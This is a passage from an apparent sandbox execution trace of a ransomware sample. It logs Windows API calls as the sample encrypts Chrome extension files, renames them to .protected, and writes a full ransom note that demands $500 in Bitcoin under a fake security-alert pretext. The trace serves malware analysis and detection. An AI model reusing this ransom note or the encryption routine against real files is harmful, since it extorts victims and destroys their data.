SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.769] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.769] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.769] CloseHandle (hObject=0x168) returned 1 [0079.769] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json.protected") returned 167 [0079.769] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json.protected")) returned 1 [0079.770] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.770] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.770] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\RESTORE_FILES.txt") returned 161 [0079.770] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.770] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.770] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.771] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.771] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.771] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.771] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.771] CloseHandle (hObject=0x164) returned 1 [0079.771] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.771] lstrcmpiW (lpString1="hr", lpString2="Windows") returned -1 [0079.771] lstrcmpiW (lpString1="hr", lpString2="Program Files") returned -1 [0079.771] lstrcmpiW (lpString1="hr", lpString2="Program Files (x86)") returned -1 [0079.771] lstrcmpiW (lpString1="hr", lpString2="$Recycle.bin") returned 1 [0079.771] lstrcmpiW (lpString1="hr", lpString2="System Volume Information") returned -1 [0079.771] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr") returned 143 [0079.771] lstrcmpW (lpString1="hr", lpString2=".") returned 1 [0079.771] lstrcmpW (lpString1="hr", lpString2="..") returned 1 [0079.771] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\*") returned 145 [0079.771] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.771] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.771] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.771] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.772] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.772] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.772] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\.") returned 145 [0079.772] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.772] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.772] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.772] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.772] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.772] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.772] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.772] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\..") returned 146 [0079.772] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.772] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.772] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.772] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.772] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.772] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.772] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.772] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.772] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json") returned 157 [0079.772] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.772] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.772] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.772] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.772] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.772] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json") returned 157 [0079.772] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.772] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json") returned 157 [0079.772] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.772] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json") returned 157 [0079.772] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.773] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.773] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.773] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.773] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.773] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.774] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.774] CloseHandle (hObject=0x168) returned 1 [0079.774] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json.protected") returned 167 [0079.774] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json.protected")) returned 1 [0079.774] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.774] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.774] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\RESTORE_FILES.txt") returned 161 [0079.774] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.775] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.775] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.775] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.775] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.775] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.775] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.776] CloseHandle (hObject=0x164) returned 1 [0079.776] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.776] lstrcmpiW (lpString1="hu", lpString2="Windows") returned -1 [0079.776] lstrcmpiW (lpString1="hu", lpString2="Program Files") returned -1 [0079.776] lstrcmpiW (lpString1="hu", lpString2="Program Files (x86)") returned -1 [0079.776] lstrcmpiW (lpString1="hu", lpString2="$Recycle.bin") returned 1 [0079.776] lstrcmpiW (lpString1="hu", lpString2="System Volume Information") returned -1 [0079.776] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu") returned 143 [0079.776] lstrcmpW (lpString1="hu", lpString2=".") returned 1 [0079.776] lstrcmpW (lpString1="hu", lpString2="..") returned 1 [0079.776] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\*") returned 145 [0079.776] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.777] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.777] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.777] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.777] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.777] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.777] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\.") returned 145 [0079.777] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.777] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.777] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.777] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.777] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.777] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.777] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.777] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\..") returned 146 [0079.777] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.777] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.777] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.777] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.777] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.777] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.777] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.777] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.777] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json") returned 157 [0079.777] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.777] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.777] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.777] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.777] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.777] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json") returned 157 [0079.777] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.778] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json") returned 157 [0079.778] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.778] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json") returned 157 [0079.778] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.778] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.778] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.778] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.778] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.779] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, 